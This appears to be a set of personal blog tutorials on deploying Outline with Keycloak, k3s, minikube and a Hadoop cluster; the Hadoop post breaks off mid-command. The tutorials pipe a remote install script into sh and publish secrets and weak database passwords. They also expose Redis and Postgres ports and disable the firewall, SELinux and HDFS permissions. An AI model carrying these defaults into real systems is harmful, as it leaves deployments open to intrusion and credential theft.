[{"content":"Setting up Outline\nReference: Deploying the Outline team knowledge base with Docker on local storage (Outline deployment)\nPreparation\nInstall Docker and the Docker Compose plugin\n# Start with the usual package index update\nsudo apt update\n# Install Docker\nsudo apt install docker.io -y\nsudo systemctl enable docker \u0026amp;\u0026amp; sudo systemctl start docker\nsudo usermod -aG docker $USER # Grant the current user access to Docker (takes effect after logging in again)\n# Install Docker Compose\nsudo apt install docker-compose-plugin -y\n# Verify the installation: it succeeded if a version is printed\ndocker compose version\nConfigure Docker registry mirrors\n# Create the configuration file\nvim /etc/docker/daemon.json\n# Paste the following content\n{\n  \u0026#34;registry-mirrors\u0026#34;: [\n    \u0026#34;https://docker.1ms.run\u0026#34;,\n    \u0026#34;https://docker-0.unsee.tech\u0026#34;,\n    \u0026#34;https://docker.m.daocloud.io\u0026#34;\n  ],\n  \u0026#34;live-restore\u0026#34;: true,\n  \u0026#34;features\u0026#34;: { \u0026#34;buildkit\u0026#34;: true }\n}\n# Restart Docker\nsystemctl daemon-reload\nsystemctl restart docker\nDeployment\nCreate the directory layout\n# Directory layout to create\n/\n└── data/\n    ├── keycloak\n    │   └── docker-compose.yml\n    └── outline\n        ├── docker-compose.yml\n        ├── docker.env\n        └── redis.conf\nkeycloak/docker-compose.yml\nname: \u0026#39;keycloak\u0026#39;\nnetworks:\n  stack-network:\n    external: true\nvolumes:\n  keycloak-postgres:\nservices:\n  postgres-keycloak:\n    image: ${KEYCLOAK_POSTGRES_IMAGE_TAG}\n    volumes:\n      - keycloak-postgres:/var/lib/postgresql/data\n    environment:\n      POSTGRES_DB: ${KEYCLOAK_DB_NAME}\n      POSTGRES_USER: ${KEYCLOAK_DB_USER}\n      POSTGRES_PASSWORD: ${KEYCLOAK_DB_PASSWORD}\n    networks:\n      - stack-network\n    healthcheck:\n      test: [ \u0026#34;CMD\u0026#34;, \u0026#34;pg_isready\u0026#34;, \u0026#34;-q\u0026#34;, \u0026#34;-d\u0026#34;, \u0026#34;${KEYCLOAK_DB_NAME}\u0026#34;, \u0026#34;-U\u0026#34;, \u0026#34;${KEYCLOAK_DB_USER}\u0026#34; ]\n      interval: 10s\n      timeout: 5s\n      retries: 3\n      start_period: 60s\n    restart: unless-stopped\n  keycloak:\n    image: ${KEYCLOAK_IMAGE_TAG}\n    command: start-dev\n    
environment:\n      KC_DB: postgres\n      KC_DB_URL_HOST: postgres-keycloak\n      KC_DB_URL_DATABASE: ${KEYCLOAK_DB_NAME}\n      KC_DB_USERNAME: ${KEYCLOAK_DB_USER}\n      KC_DB_PASSWORD: ${KEYCLOAK_DB_PASSWORD}\n      KC_DB_SCHEMA: public\n      KEYCLOAK_ADMIN: ${KEYCLOAK_ADMIN_USERNAME}\n      KEYCLOAK_ADMIN_PASSWORD: ${KEYCLOAK_ADMIN_PASSWORD}\n      KC_HEALTH_ENABLED: \u0026#39;true\u0026#39;\n      KC_HOSTNAME: ${KEYCLOAK_HOSTNAME}\n      KC_HTTP_ENABLED: \u0026#39;true\u0026#39;\n      KC_PROXY_HEADERS: \u0026#39;xforwarded\u0026#39;\n      PROXY_ADDRESS_FORWARDING: \u0026#39;true\u0026#39;\n    ports:\n      - \u0026#34;8080:8080\u0026#34;\n    networks:\n      - stack-network\n    healthcheck:\n      test:\n        - \u0026#34;CMD-SHELL\u0026#34;\n        - |\n          exec 3\u0026lt;\u0026gt;/dev/tcp/localhost/9000 \u0026amp;\u0026amp; echo -e \u0026#39;GET /health/ready HTTP/1.1\\r\\nHost: localhost\\r\\nConnection: close\\r\\n\\r\\n\u0026#39; \u0026gt;\u0026amp;3 \u0026amp;\u0026amp; cat \u0026lt;\u0026amp;3 | tee /tmp/healthcheck.log | grep -q \u0026#39;200 OK\u0026#39;\n      interval: 10s\n      timeout: 5s\n      retries: 3\n      start_period: 90s\n    restart: unless-stopped\n    depends_on:\n      postgres-keycloak:\n        condition: service_healthy\noutline/docker-compose.yml\nname: \u0026#34;outline\u0026#34;\nnetworks:\n  stack-network:\n    external: true\nservices:\n  outline:\n    image: outlinewiki/outline:0.78.0\n    env_file: ./docker.env\n    networks:\n      - stack-network\n    ports:\n      - \u0026#34;3000:3000\u0026#34;\n    volumes:\n      - storage-data:/var/lib/outline/data\n    depends_on:\n      - postgres\n      - redis\n  redis:\n    image: redis:7-alpine\n    env_file: ./docker.env\n    networks:\n      - stack-network\n    ports:\n      - \u0026#34;6379:6379\u0026#34;\n    volumes:\n      - ./redis.conf:/redis.conf\n    command: [\u0026#34;redis-server\u0026#34;, \u0026#34;/redis.conf\u0026#34;]\n    healthcheck:\n      test: [\u0026#34;CMD\u0026#34;, \u0026#34;redis-cli\u0026#34;, \u0026#34;ping\u0026#34;]\n      interval: 10s\n      timeout: 30s\n      retries: 3\n  postgres:\n    image: postgres:16-alpine\n    env_file: ./docker.env\n    
networks:\n      - stack-network\n    ports:\n      - \u0026#34;5432:5432\u0026#34;\n    volumes:\n      - database-data:/var/lib/postgresql/data\n    healthcheck:\n      test: [\u0026#34;CMD\u0026#34;, \u0026#34;pg_isready\u0026#34;, \u0026#34;-d\u0026#34;, \u0026#34;outline\u0026#34;, \u0026#34;-U\u0026#34;, \u0026#34;user\u0026#34;]\n      interval: 30s\n      timeout: 20s\n      retries: 3\n    environment:\n      POSTGRES_USER: \u0026#39;user\u0026#39;\n      POSTGRES_PASSWORD: \u0026#39;pass\u0026#39;\n      POSTGRES_DB: \u0026#39;outline\u0026#39;\nvolumes:\n  storage-data:\n  database-data:\noutline/docker.env.txt\n# –––––––––––––––– REQUIRED –––––––––––––––– NODE_ENV=production # Generate a hex-encoded 32-byte random key. You should use `openssl rand -hex 32` # in your terminal to generate a random value. SECRET_KEY=98ea98adade7b6af8c4252651b195d4083c484b833b8e0e638623ae60cc7d24e # Generate a unique random key. The format is not important but you could still use # `openssl rand -hex 32` in your terminal to produce this. 
UTILS_SECRET=98ea98adade7b6af8c4252651b195d4083c484b833b8e0e638623ae60cc7d24e # For production point these at your databases, in development the default # should work out of the box. DATABASE_URL=postgres://user:pass@postgres:5432/outline DATABASE_CONNECTION_POOL_MIN= DATABASE_CONNECTION_POOL_MAX= # Uncomment this to disable SSL for connecting to Postgres PGSSLMODE=disable # For redis you can either specify an ioredis compatible url like this REDIS_URL=redis://redis:6379 # or alternatively, if you would like to provide additional connection options, # use a base64 encoded JSON connection option object. Refer to the ioredis documentation # for a list of available options. # Example: Use Redis Sentinel for high availability # {\u0026#34;sentinels\u0026#34;:[{\u0026#34;host\u0026#34;:\u0026#34;sentinel-0\u0026#34;,\u0026#34;port\u0026#34;:26379},{\u0026#34;host\u0026#34;:\u0026#34;sentinel-1\u0026#34;,\u0026#34;port\u0026#34;:26379}],\u0026#34;name\u0026#34;:\u0026#34;mymaster\u0026#34;} # REDIS_URL=ioredis://eyJzZW50aW5lbHMiOlt7Imhvc3QiOiJzZW50aW5lbC0wIiwicG9ydCI6MjYzNzl9LHsiaG9zdCI6InNlbnRpbmVsLTEiLCJwb3J0IjoyNjM3OX1dLCJuYW1lIjoibXltYXN0ZXIifQ== # URL should point to the fully qualified, publicly accessible URL. If using a # proxy the port in URL and PORT may be different. URL=http://192.168.1.11:3000 PORT=3000 # See [documentation](docs/SERVICES.md) on running a separate collaboration # server, for normal operation this does not need to be set. COLLABORATION_URL= # Specify what storage system to use. Possible value is one of \u0026#34;s3\u0026#34; or \u0026#34;local\u0026#34;. # For \u0026#34;local\u0026#34;, the avatar images and document attachments will be saved on local disk. FILE_STORAGE=local # If \u0026#34;local\u0026#34; is configured for FILE_STORAGE above, then this sets the parent directory under # which all attachments/images go. Make sure that the process has permissions to create # this path and also to write files to it. 
FILE_STORAGE_LOCAL_ROOT_DIR=/var/lib/outline/data # Maximum allowed size for the uploaded attachment. FILE_STORAGE_UPLOAD_MAX_SIZE=262144000 # Override the maximum size of document imports, generally this should be lower # than the document attachment maximum size. FILE_STORAGE_IMPORT_MAX_SIZE= # Override the maximum size of workspace imports, these can be especially large # and the files are temporary being automatically deleted after a period of time. FILE_STORAGE_WORKSPACE_IMPORT_MAX_SIZE= # To support uploading of images for avatars and document attachments in a distributed # architecture an s3-compatible storage can be configured if FILE_STORAGE=s3 above. AWS_ACCESS_KEY_ID= AWS_SECRET_ACCESS_KEY= AWS_REGION= AWS_S3_ACCELERATE_URL= AWS_S3_UPLOAD_BUCKET_URL= AWS_S3_UPLOAD_BUCKET_NAME= AWS_S3_FORCE_PATH_STYLE= AWS_S3_ACL= # –––––––––––––– AUTHENTICATION –––––––––––––– # Third party signin credentials, at least ONE OF EITHER Google, Slack, # or Microsoft is required for a working installation or you\u0026#39;ll have no sign-in # options. # To configure Slack auth, you\u0026#39;ll need to create an Application at # =\u0026gt; https://api.slack.com/apps # # When configuring the Client ID, add a redirect URL under \u0026#34;OAuth \u0026amp; Permissions\u0026#34;: # https://\u0026lt;URL\u0026gt;/auth/slack.callback SLACK_CLIENT_ID= SLACK_CLIENT_SECRET= # To configure Google auth, you\u0026#39;ll need to create an OAuth Client ID at # =\u0026gt; https://console.cloud.google.com/apis/credentials # # When configuring the Client ID, add an Authorized redirect URI: # https://\u0026lt;URL\u0026gt;/auth/google.callback GOOGLE_CLIENT_ID= GOOGLE_CLIENT_SECRET= # To configure Microsoft/Azure auth, you\u0026#39;ll need to create an OAuth Client. 
See # the guide for details on setting up your Azure App: # =\u0026gt; https://wiki.generaloutline.com/share/dfa77e56-d4d2-4b51-8ff8-84ea6608faa4 AZURE_CLIENT_ID= AZURE_CLIENT_SECRET= AZURE_RESOURCE_APP_ID= # To configure generic OIDC auth, you\u0026#39;ll need some kind of identity provider. # See documentation for whichever IdP you use to acquire the following info: # Redirect URI is https://\u0026lt;URL\u0026gt;/auth/oidc.callback OIDC_CLIENT_ID=outline OIDC_CLIENT_SECRET=zmnUeCs2gxqdNgakM7NcRqdBYnVX47gf OIDC_AUTH_URI=\u0026#34;http://192.168.1.11:8080/realms/outline/protocol/openid-connect/auth\u0026#34; OIDC_TOKEN_URI=\u0026#34;http://192.168.1.11:8080/realms/outline/protocol/openid-connect/token\u0026#34; OIDC_USERINFO_URI=\u0026#34;http://192.168.1.11:8080/realms/outline/protocol/openid-connect/userinfo\u0026#34; OIDC_LOGOUT_URI= # Specify which claims to derive user information from # Supports any valid JSON path with the JWT payload OIDC_USERNAME_CLAIM=preferred_username # Display name for OIDC authentication OIDC_DISPLAY_NAME=keycloak # Space separated auth scopes. OIDC_SCOPES=openid profile email # To configure the GitHub integration, you\u0026#39;ll need to create a GitHub App at # =\u0026gt; https://github.com/settings/apps # # When configuring the Client ID, add a redirect URL under \u0026#34;Permissions \u0026amp; events\u0026#34;: # https://\u0026lt;URL\u0026gt;/api/github.callback GITHUB_CLIENT_ID= GITHUB_CLIENT_SECRET= GITHUB_APP_NAME= GITHUB_APP_ID= GITHUB_APP_PRIVATE_KEY= # To configure Discord auth, you\u0026#39;ll need to create a Discord Application at # =\u0026gt; https://discord.com/developers/applications/ # # When configuring the Client ID, add a redirect URL under \u0026#34;OAuth2\u0026#34;: # https://\u0026lt;URL\u0026gt;/auth/discord.callback DISCORD_CLIENT_ID= DISCORD_CLIENT_SECRET= # DISCORD_SERVER_ID should be the ID of the Discord server that Outline is # integrated with. 
# Used to verify that the user is a member of the server as well as server # metadata such as nicknames, server icon and name. DISCORD_SERVER_ID= # DISCORD_SERVER_ROLES should be a comma separated list of role IDs that are # allowed to access Outline. If this is not set, all members of the server # will be allowed to access Outline. # DISCORD_SERVER_ID and DISCORD_SERVER_ROLES must be set together. DISCORD_SERVER_ROLES= # –––––––––––––––– OPTIONAL –––––––––––––––– # Base64 encoded private key and certificate for HTTPS termination. This is only # required if you do not use an external reverse proxy. See documentation: # https://wiki.generaloutline.com/share/1c922644-40d8-41fe-98f9-df2b67239d45 SSL_KEY= SSL_CERT= # If using a Cloudfront/Cloudflare distribution or similar it can be set below. # This will cause paths to javascript, stylesheets, and images to be updated to # the hostname defined in CDN_URL. In your CDN configuration the origin server # should be set to the same as URL. CDN_URL= # Auto-redirect to https in production. The default is true but you may set to # false if you can be sure that SSL is terminated at an external loadbalancer. FORCE_HTTPS=false # Have the installation check for updates by sending anonymized statistics to # the maintainers ENABLE_UPDATES=true # How many processes should be spawned. As a reasonable rule divide your servers # available memory by 512 for a rough estimate WEB_CONCURRENCY=1 # You can remove this line if your reverse proxy already logs incoming http # requests and this ends up being duplicative DEBUG=http # Configure lowest severity level for server logs. 
Should be one of # error, warn, info, http, verbose, debug and silly LOG_LEVEL=info # For a complete Slack integration with search and posting to channels the # following configs are also needed, some more details # =\u0026gt; https://wiki.generaloutline.com/share/be25efd1-b3ef-4450-b8e5-c4a4fc11e02a # SLACK_VERIFICATION_TOKEN= SLACK_APP_ID= SLACK_MESSAGE_ACTIONS= # For Dropbox integration, follow these instructions to get the key https://www.dropbox.com/developers/embedder#setup # and do not forget to whitelist your domain name in the app settings DROPBOX_APP_KEY= # Optionally enable Sentry (sentry.io) to track errors and performance, # and optionally add a Sentry proxy tunnel for bypassing ad blockers in the UI: # https://docs.sentry.io/platforms/javascript/troubleshooting/#using-the-tunnel-option) SENTRY_DSN= SENTRY_TUNNEL= # To support sending outgoing transactional emails such as \u0026#34;document updated\u0026#34; or # \u0026#34;you\u0026#39;ve been invited\u0026#34; you\u0026#39;ll need to provide authentication for an SMTP server SMTP_HOST= SMTP_PORT= SMTP_USERNAME= SMTP_PASSWORD= SMTP_FROM_EMAIL= SMTP_REPLY_EMAIL= SMTP_TLS_CIPHERS= SMTP_SECURE=true # The default interface language. See translate.getoutline.com for a list of # available language codes and their rough percentage translated. 
DEFAULT_LANGUAGE=en_US # Optionally enable rate limiter at application web server RATE_LIMITER_ENABLED=true # Configure default throttling parameters for rate limiter RATE_LIMITER_REQUESTS=1000 RATE_LIMITER_DURATION_WINDOW=60 # Iframely API config #IFRAMELY_URL= #IFRAMELY_API_KEY=\nStart-up\n# Change to the directory that contains the docker-compose.yml file\n# Start Keycloak\ncd /data/keycloak\n# Start\ndocker compose up -d\n# Start Outline\ncd /data/outline\n# Start\ndocker compose up -d\n# Stop\ndocker compose down","date":"2025-11-02T00:00:00Z","image":"https://Izumiy0.github.io/p/%E4%BD%BF%E7%94%A8docker%E6%90%AD%E5%BB%BA%E6%9C%AC%E5%9C%B0%E7%9F%A5%E8%AF%86%E5%BA%93outline-%E4%BD%BF%E7%94%A8keycloak%E5%AE%9E%E7%8E%B0%E6%9C%AC%E5%9C%B0%E6%B3%A8%E5%86%8C%E8%AE%A4%E8%AF%81/outline_hu_daece1b65bf39a94.png","permalink":"https://Izumiy0.github.io/p/%E4%BD%BF%E7%94%A8docker%E6%90%AD%E5%BB%BA%E6%9C%AC%E5%9C%B0%E7%9F%A5%E8%AF%86%E5%BA%93outline-%E4%BD%BF%E7%94%A8keycloak%E5%AE%9E%E7%8E%B0%E6%9C%AC%E5%9C%B0%E6%B3%A8%E5%86%8C%E8%AE%A4%E8%AF%81/","title":"Building a local Outline knowledge base with Docker, using Keycloak for local registration and authentication"},{"content":"Setting up Kubernetes with k3s on Ubuntu-service-2024\nk3s installation \u0026amp; usage\n# Install from the mirror in mainland China\ncurl -sfL https://rancher-mirror.rancher.cn/k3s/k3s-install.sh | INSTALL_K3S_MIRROR=cn sh -s - \\\n  --system-default-registry \u0026#34;registry.cn-hangzhou.aliyuncs.com\u0026#34;\n# Uninstall\nsudo k3s-uninstall.sh\n# Check; this takes a while\nkubectl get nodes\nkubectl get pod -A # Check whether they all show 0/1; if only one does, that is fine\n# Export a Docker image to a tar file; make sure the image works before exporting\ndocker save test -o test.tar\n# Import it into ctr so that Kubernetes can use the local image\nsudo k3s ctr image import test.tar\n# List the images in ctr\nsudo k3s ctr image list\n# Start a service and expose it outside the cluster\n# Create the deployment from the command line; --port means the deployment serves on port 80\nsudo kubectl create deployment base-nginx --image=base_images/base_nginx --port 80\n# Check\nsudo kubectl get all\n# Start the service with type NodePort; --target-port=80 is the port the deployment serves on, --node-port=30080 is the port on which the service is offered outside the cluster\nsudo kubectl expose deployment base-nginx 
--type=NodePort --port=80 --target-port=80 --name=base-nginx-service --node-port=30080\n# Check\nsudo kubectl get all\n# After start-up, netstat may not show the port the service listens on, but it can still be reached normally\nsudo kubectl get svc -o wide","date":"2025-09-19T00:00:00Z","image":"https://Izumiy0.github.io/p/ubuntu-service-2024%E4%BD%BF%E7%94%A8k3s%E6%90%AD%E5%BB%BAkubernetes/k3s_hu_65b4856025b4b63f.png","permalink":"https://Izumiy0.github.io/p/ubuntu-service-2024%E4%BD%BF%E7%94%A8k3s%E6%90%AD%E5%BB%BAkubernetes/","title":"Setting up Kubernetes with k3s on Ubuntu-service-2024"},{"content":"Setting up Kubernetes with minikube on Ubuntu-service-2024\nDownloading and installing minikube\nOfficial documentation\nCommon commands\n# Check minikube status\nminikube status\n# Show cluster information\nminikube kubectl -- cluster-info\n# Show node information\nminikube kubectl -- get nodes\n# Enter the minikube environment\nminikube ssh\n# Check cluster status\nminikube status\n# List all Pods\nminikube kubectl -- get pods\n# View Pod logs\nminikube kubectl -- logs \u0026lt;pod-name\u0026gt;\nThe official documentation is usually enough; below are the problems I ran into and how I solved them.\nEnvironment: an Ubuntu virtual machine with 2 cores and 4 GB of RAM, using the docker driver.\nThe start script follows\n#!/bin/bash\n#\nexport HTTP_PROXY=http://your-proxy:port\nexport HTTPS_PROXY=http://your-proxy:port\n# Start minikube with the Alibaba Cloud mirror; it does not seem to help much, though, and it still fails without a proxy\nminikube start --driver=docker \\\n  --image-mirror-country=\u0026#39;cn\u0026#39; \\\n  --image-repository=\u0026#39;registry.cn-hangzhou.aliyuncs.com/google_containers\u0026#39; \\\n  --memory=2048mb \\\n  --cpus=2 \\\n  --force\nStart-up fails because of a permission problem accessing Docker\nSolution:\n# 1. Add the current user to the docker group\nsudo usermod -aG docker $USER\n# Log out of the current session and log in again, or use the following command to apply it immediately\nnewgrp docker\n# 2. Start as the root user\n# 3. Do not use the docker driver; run directly on the host or use KVM or similar\n# Add the parameter\n--driver=none # Run kubernetes ctl directly on the physical machine\n--driver=kvm\t# Use KVM instead of Docker\nNetwork problems pulling images on first start with the docker driver\nSolution:\n# Add a proxy\nexport HTTP_PROXY=http://your-proxy:port\nexport HTTPS_PROXY=http://your-proxy:port\nNo virtual machine driver installed, so minikube start fails with Exiting due to DRV_NOT_DETECTED\n# Install KVM, for example on Ubuntu:\nsudo apt install qemu-kvm\nStart-up fails because of insufficient resources\n# Adjust the resource allocation; give more or less depending on your situation\nminikube config set memory 4096 # Allocate 4 GB of memory\nminikube config set cpus 2 # Allocate 2 CPU cores\nminikube delete 
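\u0026amp;\u0026amp; minikube start\nOld cluster not cleaned up: leftover configuration conflicts after several failed starts\n# Completely delete the old cluster\nminikube delete --all --purge\nRunning your first Kubernetes application\n# Deploy the Nginx service; the nginx image must be present in Docker\nminikube kubectl -- create deployment fuzzing --image=fuzzing\n# --port=80 is the container port to listen on, that is, the port on which the image serves\nminikube kubectl -- create deployment fuzzing --image=utibetctf/fuzzing --port=80\n# --port=8000 is the port of the service\n# --target-port 80 is the Pod port that traffic is forwarded to\nminikube kubectl -- expose deployment fuzzing --type=NodePort --port=8000 --target-port 80\n# Access the service\nminikube service fuzzing\n# Show the Service details\nminikube kubectl -- get service fuzzing -o wide\n# Delete\n# First list all resources\nminikube kubectl -- get all --show-labels\n# Then delete precisely, using the resource names shown\nminikube kubectl -- delete deployment/\u0026lt;name\u0026gt; service/\u0026lt;name\u0026gt;","date":"2025-09-19T00:00:00Z","image":"https://Izumiy0.github.io/p/ubuntu-service-2024%E4%BD%BF%E7%94%A8minicube%E6%90%AD%E5%BB%BAkubernetes/minikube_hu_8234b4ceaa65943d.png","permalink":"https://Izumiy0.github.io/p/ubuntu-service-2024%E4%BD%BF%E7%94%A8minicube%E6%90%AD%E5%BB%BAkubernetes/","title":"Setting up Kubernetes with minikube on Ubuntu-service-2024"},{"content":"A very detailed guide to building a Hadoop cluster: from environment preparation to a successful start\nAs the core framework of the big data ecosystem, Hadoop and its distributed cluster deployment are a key first step into big data technology. Using Hadoop 3.3.4 as the example, this article builds a 3-node Hadoop cluster (1 master, 2 workers) from scratch, with the key configuration code and pitfalls to avoid along the way, so that beginners can also complete the setup.\nI. Environment preparation: laying the groundwork for the cluster\nBefore the actual setup, complete the hardware planning, operating system configuration and software dependency installation; these are the precondition for a stable cluster.\n1.1 Cluster node planning\nThis setup uses a \u0026#34;1 master, 2 workers\u0026#34; architecture with the following role assignment (adjust to the number of servers you actually have):\nNode IP | Hostname | Roles | Recommended hardware (minimum)\n192.168.1.10 | hadoop01 | NameNode, ResourceManager | 2 cores, 4 GB RAM, 50 GB disk\n192.168.1.11 | hadoop02 | DataNode, NodeManager | 2 cores, 2 GB RAM, 50 GB disk\n192.168.1.12 | hadoop03 | DataNode, NodeManager | 2 cores, 2 GB RAM, 50 GB disk\nNote: all nodes must be on the same LAN, with the firewall turned off (to avoid blocked ports).\n1.2 Operating system configuration (run on all nodes)\nThis article uses CentOS 7; the following operations must be run as root or with sudo:\n(1) Turn off the firewall and SELinux\nThe nodes of a Hadoop cluster communicate over many ports; turning off the firewall avoids configuring complex port rules:\n# Turn off the firewall (temporarily + permanently)\nsystemctl stop firewalld\nsystemctl disable firewalld\n# Turn off SELinux (temporarily + permanently)\nsetenforce 0\nsed -i \u0026#39;s/SELINUX=enforcing/SELINUX=disabled/\u0026#39; 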
/etc/selinux/config\n(2) Configure hostnames and IP mapping\nSet the hostname (run the matching command on each node):\n# On node hadoop01\nhostnamectl set-hostname hadoop01\n# On node hadoop02\nhostnamectl set-hostname hadoop02\n# On node hadoop03\nhostnamectl set-hostname hadoop03\nConfigure the IP mapping (run on all nodes; replace the IPs with your actual node IPs):\necho \u0026#34;192.168.1.10 hadoop01\u0026#34; \u0026gt;\u0026gt; /etc/hosts\necho \u0026#34;192.168.1.11 hadoop02\u0026#34; \u0026gt;\u0026gt; /etc/hosts\necho \u0026#34;192.168.1.12 hadoop03\u0026#34; \u0026gt;\u0026gt; /etc/hosts\n(3) Install the Java environment\nHadoop depends on Java (JDK 8 or later is required); OpenJDK is recommended:\n# Install OpenJDK 8\nyum install -y java-1.8.0-openjdk-devel\n# Verify the installation (it succeeded if version information appears)\njava -version\njavac -version\n# Configure the JAVA_HOME environment variable (run on all nodes)\necho \u0026#34;export JAVA_HOME=/usr/lib/jvm/java-1.8.0-openjdk\u0026#34; \u0026gt;\u0026gt; /etc/profile\n# Single quotes keep $PATH and $JAVA_HOME unexpanded until /etc/profile is sourced\necho \u0026#39;export PATH=$PATH:$JAVA_HOME/bin\u0026#39; \u0026gt;\u0026gt; /etc/profile\nsource /etc/profile # Apply the configuration\n1.3 Configure passwordless SSH login (master node → worker nodes)\nThe Hadoop master node (hadoop01) needs passwordless SSH login to all worker nodes, so that no password has to be entered when the cluster starts:\n# Generate an SSH key on node hadoop01 (press Enter all the way, no passphrase)\nssh-keygen -t rsa\n# Distribute the public key to all nodes (including itself)\nssh-copy-id hadoop01\nssh-copy-id hadoop02\nssh-copy-id hadoop03\n# Verify passwordless login (it succeeded if there is no password prompt)\nssh hadoop02\nII. Hadoop installation and core configuration\n2.1 Download and unpack Hadoop (run on the master node)\nDownload the Hadoop package from the Apache website; the stable release 3.3.4 is recommended:\n# Download Hadoop (or download it manually and upload it)\nwget https://archive.apache.org/dist/hadoop/core/hadoop-3.3.4/hadoop-3.3.4.tar.gz\n# Unpack into /usr/local\ntar -zxvf hadoop-3.3.4.tar.gz -C /usr/local/\n# Rename to hadoop (for convenience later)\nmv /usr/local/hadoop-3.3.4 /usr/local/hadoop\n2.2 Configure the Hadoop environment variables (run on all nodes)\n# Edit the profile file\nvim /etc/profile\n# Add the following (at the end)\nexport HADOOP_HOME=/usr/local/hadoop\nexport PATH=$PATH:$HADOOP_HOME/bin:$HADOOP_HOME/sbin\n# Apply the configuration\nsource /etc/profile\n# Verify (it succeeded if version information appears)\nhadoop version\n2.3 Edit the Hadoop core configuration files (run on the master node)\nThe Hadoop configuration files are in the $HADOOP_HOME/etc/hadoop/ directory; the following 5 key files need to be edited:\n(1) hadoop-env.sh (set the Java path)\nvim $HADOOP_HOME/etc/hadoop/hadoop-env.sh\n# 
Add the Java environment variable (replace with your JAVA_HOME path)\nexport JAVA_HOME=/usr/lib/jvm/java-1.8.0-openjdk\n(2) core-site.xml (core configuration: set the NameNode address)\nvim $HADOOP_HOME/etc/hadoop/core-site.xml\n# Add inside the \u0026lt;configuration\u0026gt; tag:\n\u0026lt;property\u0026gt;\n  \u0026lt;name\u0026gt;fs.defaultFS\u0026lt;/name\u0026gt;\n  \u0026lt;!-- NameNode address: hdfs://hostname:port --\u0026gt;\n  \u0026lt;value\u0026gt;hdfs://hadoop01:9000\u0026lt;/value\u0026gt;\n\u0026lt;/property\u0026gt;\n\u0026lt;property\u0026gt;\n  \u0026lt;name\u0026gt;hadoop.tmp.dir\u0026lt;/name\u0026gt;\n  \u0026lt;!-- Hadoop temporary directory (must be created manually) --\u0026gt;\n  \u0026lt;value\u0026gt;/usr/local/hadoop/tmp\u0026lt;/value\u0026gt;\n\u0026lt;/property\u0026gt;\n(3) hdfs-site.xml (HDFS configuration: replication factor, NameNode/DataNode storage paths)\nvim $HADOOP_HOME/etc/hadoop/hdfs-site.xml\n# Add inside the \u0026lt;configuration\u0026gt; tag:\n\u0026lt;property\u0026gt;\n  \u0026lt;name\u0026gt;dfs.replication\u0026lt;/name\u0026gt;\n  \u0026lt;!-- Replication factor (recommended \u0026lt;= number of worker nodes; set to 2 here) --\u0026gt;\n  \u0026lt;value\u0026gt;2\u0026lt;/value\u0026gt;\n\u0026lt;/property\u0026gt;\n\u0026lt;property\u0026gt;\n  \u0026lt;name\u0026gt;dfs.namenode.name.dir\u0026lt;/name\u0026gt;\n  \u0026lt;!-- NameNode data storage path (must be created manually) --\u0026gt;\n  \u0026lt;value\u0026gt;/usr/local/hadoop/dfs/name\u0026lt;/value\u0026gt;\n\u0026lt;/property\u0026gt;\n\u0026lt;property\u0026gt;\n  \u0026lt;name\u0026gt;dfs.datanode.data.dir\u0026lt;/name\u0026gt;\n  \u0026lt;!-- DataNode data storage path (must be created manually) --\u0026gt;\n  \u0026lt;value\u0026gt;/usr/local/hadoop/dfs/data\u0026lt;/value\u0026gt;\n\u0026lt;/property\u0026gt;\n\u0026lt;!-- Turn off HDFS permission checking (beginner friendly) --\u0026gt;\n\u0026lt;property\u0026gt;\n  \u0026lt;name\u0026gt;dfs.permissions.enabled\u0026lt;/name\u0026gt;\n  \u0026lt;value\u0026gt;false\u0026lt;/value\u0026gt;\n\u0026lt;/property\u0026gt;\n(4) mapred-site.xml (MapReduce configuration: use YARN as the resource manager)\n
vim $HADOOP_HOME/etc/hadoop/mapred-site.xml\n# Add inside the \u0026lt;configuration\u0026gt; tag:\n\u0026lt;property\u0026gt;\n  \u0026lt;name\u0026gt;mapreduce.framework.name\u0026lt;/name\u0026gt;\n  \u0026lt;!-- Run MapReduce on YARN --\u0026gt;\n  \u0026lt;value\u0026gt;yarn\u0026lt;/value\u0026gt;\n\u0026lt;/property\u0026gt;\n\u0026lt;property\u0026gt;\n  \u0026lt;name\u0026gt;mapreduce.application.classpath\u0026lt;/name\u0026gt;\n  \u0026lt;!-- Hadoop 3.x needs the classpath set, to avoid start-up errors --\u0026gt;\n  \u0026lt;value\u0026gt;$HADOOP_HOME/share/hadoop/mapreduce/*:$HADOOP_HOME/share/hadoop/mapreduce/lib/*\u0026lt;/value\u0026gt;\n\u0026lt;/property\u0026gt;\n(5) yarn-site.xml (YARN configuration: ResourceManager address, NodeManager environment)\nvim $HADOOP_HOME/etc/hadoop/yarn-site.xml\n# Add inside the \u0026lt;configuration\u0026gt; tag:\n\u0026lt;property\u0026gt;\n  \u0026lt;name\u0026gt;yarn.resourcemanager.hostname\u0026lt;/name\u0026gt;\n  \u0026lt;!-- ResourceManager runs on the master node hadoop01 --\u0026gt;\n  \u0026lt;value\u0026gt;hadoop01\u0026lt;/value\u0026gt;\n\u0026lt;/property\u0026gt;\n\u0026lt;property\u0026gt;\n  \u0026lt;name\u0026gt;yarn.nodemanager.aux-services\u0026lt;/name\u0026gt;\n  \u0026lt;!-- Enable the MapReduce shuffle service --\u0026gt;\n  \u0026lt;value\u0026gt;mapreduce_shuffle\u0026lt;/value\u0026gt;\n\u0026lt;/property\u0026gt;\n\u0026lt;!-- Work around the Hadoop 3.x memory overflow problem --\u0026gt;\n\u0026lt;property\u0026gt;\n  \u0026lt;name\u0026gt;yarn.nodemanager.vmem-check-enabled\u0026lt;/name\u0026gt;\n  \u0026lt;value\u0026gt;false\u0026lt;/value\u0026gt;\n\u0026lt;/property\u0026gt;\n2.4 Specify the worker nodes (run on the master node)\nEdit the workers file (Hadoop 3.x uses workers, 2.x uses slaves) and list the hostnames of all worker nodes:\nvim $HADOOP_HOME/etc/hadoop/workers\n# Delete the existing content and add the following two lines (worker hostnames):\nhadoop02\nhadoop03\n2.5 Sync the configuration to all worker nodes (run on the master node)\nSync the Hadoop directory configured on the master node to all worker nodes, to avoid repeating the configuration:\n# Sync to hadoop02\nscp -r /usr/local/hadoop hadoop02:/usr/local/\n# Sync to hadoop03\nscp -r /usr/local/hadoop hadoop03:/usr/local/\n# Sync the environment variable configuration (run source on every worker node to apply it)\nscp /etc/profile 
